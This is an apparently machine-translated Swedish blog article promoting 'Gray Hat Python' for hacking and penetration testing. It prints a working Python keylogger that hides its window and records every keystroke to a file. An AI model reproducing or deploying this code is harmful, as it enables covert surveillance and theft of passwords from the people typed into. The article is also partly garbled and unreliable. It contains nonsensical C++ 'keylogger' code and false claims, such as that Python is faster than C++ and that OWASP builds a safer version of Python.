Gray Hat Python - Så för två år tillbaka gjorde jag min forskning om programmeringsspråk, jag började läsa om C, C ++, Assembly, Python och Ruby. Jag ville bli expert på cybersäkerhet. Så jag började lära mig så mycket jag kan. Började med att C, C ++ och C # var grunderna, och efter att ha läst och sammanställt massor av program och virus började jag äntligen lära mig Kali Linux. För dem som inte vet vad Kali Linux är är det ett operativsystem för penetrationstest. Så jag fortsatte med mina studier och det jag såg var att de flesta program, virus och trojaner sammanställdes i Python, och deras bas var Ruby.

Så jag slutade mina studier för närvarande och började lära mig Python eller för att vara exakt Grey Hat Python och tadaa … Det var oerhört enkelt jämfört med C, C # eller något annat språk jag lärde mig. Jag fick äntligen veta varför Python var det mest använda språket och hur det blev berömt.
Så idag skulle jag diskutera hur Python förvandlades till Gray Hat Python och varför den används så omfattande att till och med Google och YouTube använder den i sin databas för att ge så exakta sökresultat som de kan.

Från och med är Python ett programmeringsspråk på hög nivå, vilket innebär att syntaxerna är extremt enkla att läsa, även för nybörjare. Om du är ny med att programmera, skulle detta vara det språk jag skulle föreslå att du börjar med. Låt mig ge dig ett exempel:

Så här ser det ut i C: -

#include

int main()
(
printf("Hello world\n");
return 0;
)

Så här ser det ut i Java: -

class HelloWorld
(
public static void main (String args())
(
System.out.println ("Hello World");
)
)

Och så ser det ut i Python (v2.7)

print "Hello World"

Enkel? Ja det är det. Så Python var inte bara lätt att skriva och förstå, utan också mycket kompakt. Så du kanske undrar hur ledde detta till Gray Hat Python?

Rekommenderade kurser

  • IP Routing Training
  • Hacking Training Course
  • Avsluta RMAN-utbildning
  • Python-programmeringsträning

Python vs Gray Hat Python

Så vad är egentligen Gray Hat Python? Varför skiljer det sig så mycket från vår vanliga Python? Saken är Grey Hat Python är inget annat än program skrivna i Python av hackare, nätverkstresstestare och Reverse Engineers för att skapa eller knäcka ett program. Men termen Gray Hat används eftersom det inte exakt är en fördelaktig eller användarprogramvara. Det används för att säkra, eller skapa en säkerhetsbrytande programvara.

Det kan enkelt användas för att antingen testa begränsningarna i en säker miljö eller för att bryta in i en säker miljö. Det är vad Gray Hat betyder. Och det är mycket lättare att göra det i Python snarare än att göra det i C, C ++ eller java. Således namnet Gray Hat Python. Några exempel jag kan tänka på är:

• Skriva nyckel-loggare (för hackare och penters)
• Skriva säkerhetsskalskript (för nätverksadministratörer)
• Skriva ett automatiserat IDS (Intrusion Detection System for Security Engineers)

Så nu vet du varför och hur Gray Hat Python är användbar. För att utarbeta detta, låt mig ge dig några detaljerade exempel.
Du kanske har hört talas om Google App Engine. Google App Engine designades ursprungligen i Python innan den överfördes på. Google App är ett riktigt exempel på ett program skrivet i Python, eftersom det tillåter att bygga webbapplikationer med sin avancerade samling av bibliotek, verktyg och ramverk.

Har du någonsin undrat varför är det så enkelt att söka efter något på Google? För det mesta får du sökresultat som är 80% korrekta. Detta beror på att Python är extremt flexibel, fungerar med hög hastighet och databaserna är mycket mer kompakta men det lagrar 'n' antal information. Python är så utdragbar att även YouTube använder den för syften som att titta på video, kontrollera mallar, administrera video, tillgång till kanonisk data och många fler.

Google har sina sökrobotar och spindlar som samlar in data så snart de laddas upp på webben, oavsett var eller hur säker den är. Man behöver bara en ordentlig inspiration, tid och kunskap för att samla in denna information.

Google-sökningar baserades tidigare på Python, som senare ändrades till C ++ för hastighetsoptimering eftersom Googles sökrobotar genomsöker många sidor per sekund och var och en av dem tar några minuter att lyckas genomsöka. Python är för närvarande mycket snabbare än C ++, men det var inte samma fall för några decennier sedan.

Det fanns ett berömt citat citerat av Google: -
"Python där vi kan, C ++ där vi måste."

Så du kanske undrar hur detta kan användas för hackning, Pentesting och nätverkssäkerhet. Jag håller inte med. Om du kan skapa ett program som är 70% -80% korrekt för att ge effektiva sökresultat, kan du förmodligen bygga ett program som kan ansluta webbplatser, söka smart och bygga en profil för en person som snarare kan användas av individuella svarta hattar för skadliga ändamål. Lämna individer åt sidan, en om den är smart nog, kan enkelt bygga en applikation för att bygga en profil för ett företag, hela trädet från dess rot till vad du kan tänka på …

Informationssamling via Maltego

Du kanske tänker att jag överdriver lite. Nej, jag är INTE!

Tänk på exempel som Maltego. Maltego är en mjukvara eller så kan jag bättre omformulera den som open source-kriminalteknisk applikation, byggd för att samla in information och bygga profil för människor, företag och andra företag.

Man behöver bara ange korrekt data i appen, och resten av saker som att länka e-postmeddelanden, människor, grupp av människor, till och med bestämma internetinfrastruktur som domäner, DNS-namn, Netblocks och IP-adresser kan kopplas och kopplas samman med denna open source-intelligens .

För mer information besök vad som är Maltego?

Så om åtkomst till "Hemlig information" avgör din framgång, kan Maltego hjälpa dig att upptäcka den. Maltego är delvis skriven i Python och använder Java också vilket också är ett bra språk.

Så mycket att citera om säkerhet från Google. För att vara mer exakt är Google det minsta sättet du kan hålla dig anonym på nätet, spelar ingen roll om du använder inkognito eller www.duckduckgo.com från chrome. För i slutändan uppdateras allt på webben. Poängen med att vara här är att det inte handlar om okränkbarhet, det handlar om att vara absolut sårbar. Man kan inte helt torka sig helt från Internet. Men man kan säkert försöka hålla så mindre information på webben som möjligt.

Python är inte bara ett språk, det är ett skriptspråk. Med manusspråk kan du skriva, ändra dina egna verktyg när du behöver något mer anpassat. Dessa nätverkssäkerhetsverktyg är mycket beroende av skriptspråk för utvidgning. Låt oss till exempel ta Scapy.

Scapy är rent skrivet i Python. Det är ett kraftfullt interaktivt paketmanipuleringsverktyg. Det kan generera falska paket på egen hand, skanna nätverk och kan till och med sniffa paket i nätverket.

Hitta detaljerad information om Vad är Scapy?

Nu är detta komplexa program skriven av avancerade programmerare. Låt oss se hur enkelt det är att skriva ett program i Python som lätt kan förstås av människor som har några bra grunder i programmering.

Detta är en keylogger skriven i Python: -

#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window, 0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file, "a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)

proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input

Så detta är mycket mer än lätt om du frågar mig. Jag har helt enkelt lagt till modulerna pyhook, Pythoncom, win32gui och win32console som du enkelt kan ladda ner från sourceforge-webbplatsen och jag har nämnt kommentarerna med hash-taggen. Men om jag måste skriva samma program i C ++, låt oss se hur svårt kan det vara.

Detta är ett program skrivet i C ++: -

 #include #include #include #include int main(int argc, char ** agrv)( using namepace std; /*Easier*/ char std::vector input_STRUCT = ("S", "T", "O"); char std::vector input_STRUCT_1 = ("P", ""); char std::vector input_STRUCT_2 = ("L", "O", "O", "K", "I", "N", "G"); char std::vector input_STRUCT_3 = ("", "F", "O", "R"); char std::vector input_STRUCT_4 = ("M", "A", "L", "W"); char std::vector input_STRUCT_5 = ("A", "R", "E"); ostream os("C:\users\keylogger.txt"); int i; for( i = 0; i <=2; i++)( os << input_STRUCT(i); for(;i <= 1000000 ;i++)( ) ) for( i=0; i<=1;i++)( os << input_STRING_1(i); for(;i <= 1000000 ;i++)( ) ) for(i=0; i<=6; i++) ( os << input_STRING_2 (i); for(; i <= 1000000 ; i++)( ) for(i=0; i<=3;i++)( os << input_STRING_3(i); for(; i <= 1000000 ;i++)( ) ) for(i=0; i<=3; i++)( os << input_STRING_4(i); for(;i <= 1000000 ; i++)( ) ) for(i=0; i<=2; i++)( os << input_STRING_5(i); for(;i <= 1000000 ; i++)( ) ) os.close(); istream is (" C:\users\keylogger.txt "); cout << is; return 0; )

Så detta är ganska stort jämfört med Python. Och om vi talar om effektivitet, kan Python enkelt sammanställas till en körbar utan ansträngning med py2exe-programvara. Medan om jag talar om C ++, så ärligt talat, den här koden är ett skämt. För att skriva en korrekt nyckelloggare måste man skriva en DLL som implementerar WH_KEYBOARD-krok. Dessutom är denna kod långt borta från att vara lätt för en nybörjare att förstå.

Open Source Hacking

Nu tar det hand om Black Hat-hackare, som för att vara mer exakta är de människor som tänker förstöra, manipulera data för sina egna behov. Med tanke på säkerhetshänsyn är Python också användbar för White Hat-hackare som tänker rädda samhället från attacken av skadliga hackare. Om du vill utveckla en karriär eller åtminstone vill lära dig Python för säkerhetsforskning, kan du säkert komma in i djupet med OWASP, BRO eller Quick NIX Secure Script.

OWASP är Open Web Application Security Project. OWASP syftar till att skapa en säkrare version av Python som gör det lättare för säkerhetspersonal och utvecklare att skriva programvara som är mindre benägna för attacken från hackare. Det är relaterat till Black-Box-analys, identifiering och adressering av säkerhetsrelaterade problem som kan påverka Pythons interaktiva tolk.

BRO är ett nätverkssäkerhets- och trafikövervakningsprogram medan Quick NIX används för att härda och säkra filägande på språng.

Eftersom vi talar om säkerhet, låt oss prata om ett operativsystem som delvis är baserat på Python. Python fungerar bra med UNIX, LINUX och Debian. Ett av de mest kända operativsystemen var Backtrack 5. Det släpptes olika versioner. Det var speciellt utformat för PenTesting. Senare trodde folket på Offensive Security att Backtrack behövde en omstart eftersom de flesta av verktygen antingen inte fungerade korrekt eller inte stöds.

Senare släppte de Kali Linux som helt baserades på Debian. Och de flesta av dess ramar finns antingen i Ruby eller Python. Ruby är också ett fantastiskt skriptspråk. Men jag skulle när som helst föredra Python framför det, eftersom skälet är att Python har ett mer varierat samhälle med Linux och dess mer direkt och lätt att felsöka. Även om Ruby har massor av funktioner och är snabb att anpassa sig till den omgivande miljön, kan den vara svår att felsöka, svår att läsa och är mer sofistikerad än Python.

Det bästa exemplet skulle vara att jämföra Apple vs Linux eller jämföra iphone vs Android. Apple är rikt på resurser och är extremt smidigt och är mer partisk mot nybörjare. Medan Linux / Android är mer användarvänlig, lite laggy och kan vara huvudvärk ibland om du inte vet hur du konfigurerar eller underhåller den.

Det finns till och med en bok baserad på Python Gray Hat Hacking av Justin Seitz. Det handlar specifikt om att automatisera tråkiga omvänd konstruktion och säkerhetsrelaterade uppgifter, designa din egen debugger, bibliotek och DLL-injektion, sniffa säker trafik över en krypterad session och använda Immunity debugger, Sulley och många fler. Det är en fantastisk bok spelar ingen roll om du är nybörjare eller om du är en expert, du kommer alltid att lära dig en eller annan sak varje gång du läser den.

Slutsats

Så om du är nybörjare skulle Python vara rätt val för dig att börja med som ditt första programmeringssäkerhetstestspråk.

Kom bara ihåg en sak i slutändan Gray Hat Python är inte bara ett språk, det är ett sätt att göra saker på ett ordentligt och snabbt sätt.

Första bildkälla: pixabay.com

Relaterade artiklar:-

Här är några artiklar som hjälper dig att få mer information om Gray Hat Python så gå bara genom länken.

  1. Fördelarna med cybersäkerhetsverktyg Du måste vara medveten om
  2. Karriärer i Python
  3. Topp 25 fantastiska Pythonintervjufrågor och svar
  4. Vilka är fördelarna och begränsningarna med att använda Python?
  5. Python vs Node.js
  6. Guide till intervjuer om cybersäkerhet
  7. Olika typer av verktyg för säkerhetstest

Kategori:

Mjukvaruutveckling